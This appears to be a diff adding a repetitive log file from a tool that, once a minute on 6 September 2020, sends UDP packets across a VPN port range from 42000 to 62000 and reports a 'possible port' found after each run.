+Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:16:06 +Starting port fill at 2020-09-06 10:17:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:17:04 +Starting port fill at 2020-09-06 10:18:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:18:04 +Starting port fill at 2020-09-06 10:19:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:19:05 +Starting port fill at 2020-09-06 10:20:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:20:04 +Starting port fill at 2020-09-06 10:21:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:21:06 +Starting port fill at 2020-09-06 10:22:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:22:04 +Starting port fill at 2020-09-06 10:23:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 10:23:07 +Starting port fill at 2020-09-06 10:24:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:24:06 +Starting port fill at 2020-09-06 10:25:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:25:05 +Starting port fill at 2020-09-06 10:26:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 10:26:07 +Starting port fill at 2020-09-06 10:27:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 10:27:07 +Starting port fill at 2020-09-06 10:28:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:28:06 +Starting port fill at 2020-09-06 10:29:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:29:05 +Starting port fill at 2020-09-06 10:30:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 10:30:06 +Starting port fill at 2020-09-06 10:31:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:31:05 +Starting port fill at 2020-09-06 10:32:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 10:32:06 +Starting port fill at 2020-09-06 10:33:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:33:05 +Starting port fill at 2020-09-06 10:34:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:34:04 +Starting port fill at 2020-09-06 10:35:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:35:04 +Starting port fill at 2020-09-06 10:36:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 10:36:06 +Starting port fill at 2020-09-06 10:37:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:37:06 +Starting port fill at 2020-09-06 10:38:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 10:38:06 +Starting port fill at 2020-09-06 10:39:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:39:05 +Starting port fill at 2020-09-06 10:40:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:40:06 +Starting port fill at 2020-09-06 10:41:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:41:06 +Starting port fill at 2020-09-06 10:42:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:42:06 +Starting port fill at 2020-09-06 10:43:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 